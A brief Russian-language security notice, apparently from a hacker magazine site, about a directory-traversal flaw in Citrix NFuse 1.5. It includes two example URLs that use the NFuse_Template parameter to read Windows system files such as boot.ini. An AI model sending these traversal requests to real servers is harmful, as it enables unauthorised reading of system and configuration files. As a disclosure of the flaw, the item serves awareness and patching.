Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Citrix NFuse- система для управления порталом. С
ее помощью можно читать любые системные
файлы (в версии 1.5, в последующих баг,
говорят, устранен).
Например:
http://10.x.x.x/boilerplate.asp?NFuse_Template=
../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
или
http://10.x.x.x/boilerplate.asp?NFuse_Template= ../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories